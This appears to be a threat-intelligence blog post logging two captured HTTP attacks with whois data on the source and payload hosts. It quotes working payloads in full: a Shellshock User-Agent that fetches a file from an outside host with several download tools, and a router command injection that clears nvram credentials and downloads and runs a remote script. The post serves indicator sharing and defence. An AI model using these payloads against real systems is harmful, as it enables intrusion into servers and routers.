159.226.162.196 - #perl wget via 204.232.209.188

BEGIN OF HTTP DATA:
2016-02-11 19:15:33
Source IP: 159.226.162.196
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  ");'
Host: 109.234.106.8
Connection: Close


 END OF DATA

The http server returned 404 at the time of the investigation

Copyright (c) 2015,2016, Joerg Stephan All rights reserved. Disclaimer:This information is provided as-is and there is no guarantee that blocking an IP or domain reported in this overview will not adversely impact your business. Use all information provided on your own risk, the author disclaims all warranty and shall not be liable for any damage or impact caused.

159.226.162[.]196 Whois Data (TeamCymru) AS : 7497 IP : 159.226.162.196 BGP Prefix : 159.226.162.0/24 CC : CN Registry : apnic Allocated : AS Name: CSTNET-AS-AP Computer Network Information Center,CN http://www.team-cymru.org/IP-ASN-mapping.html#whois 204.232.209[.]188 Whois Data (TeamCymru) AS : 33070 IP : 204.232.209.188 BGP Prefix : 204.232.192.0/19 CC : US Registry : arin Allocated : 2009-06-24 AS Name: RMH-14 - Rackspace Hosting,US http://www.team-cymru.org/IP-ASN-mapping.html#whois Source: Local Feed Database Title: 213.136.72.84 . shellshock perl via 204.232.209.188 Reference: http://sendmespamids.blogspot.com/2016/01/2131367284-shellshock-perl-via.html In db since: 2016-01-22 08:36:12.295000

178.57.115.231 - (Russian IPs) possible DD-WRT firmware via 178.57.115.231:8081

BEGIN OF HTTP DATA:
2016-02-06 15:33:59
Source IP: 178.57.115.231
GET /cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\set$IFS\http_username;nvram$IFS\commit;sleep$IFS ;cd$IFS\/tmp;wget$IFS\http:\/\/178.57.115.231:8081\/h\/wrt\/ug.sh;chmod$IFSÿ$IFS\/tmp/ug.sh;/bin/sh$IFS\/tmp/ug.sh HTTP/1.0
Host:195.169.125.87:8080

 END OF DATA

The ug.sh tries to download an binary file





 Just by taking a look of the xxd and strings output of the file, it looks like an DD-WRT firmware file.

Copyright (c) 2015,2016, Joerg Stephan
All rights reserved.

Disclaimer:This information is provided as-is and there is no guarantee
that blocking an IP or domain reported in this overview will not adversely
impact your business. Use all information provided on your own risk,
the author disclaims all warranty and shall not be liable for any damage
or impact caused.

178.57.115[.]231

Whois Data (TeamCymru)
• AS : 60139
• IP : 178.57.115.231
• BGP Prefix : 178.57.112.0/21
• CC : RU
• Registry : ripencc
• Allocated : 2010-02-02
• AS Name: Z-TELECOM Z-Telecom Ltd,RU
• http://www.team-cymru.org/IP-ASN-mapping.html#whois

178.57.115[.]231

Whois Data (TeamCymru)
• AS : 60139
• IP : 178.57.115.231
• BGP Prefix : 178.57.112.0/21
• CC : RU
• Registry : ripencc
• Allocated : 2010-02-02
• AS Name: Z-TELECOM Z-Telecom Ltd,RU
• http://www.team-cymru.org/IP-ASN-mapping.html#whois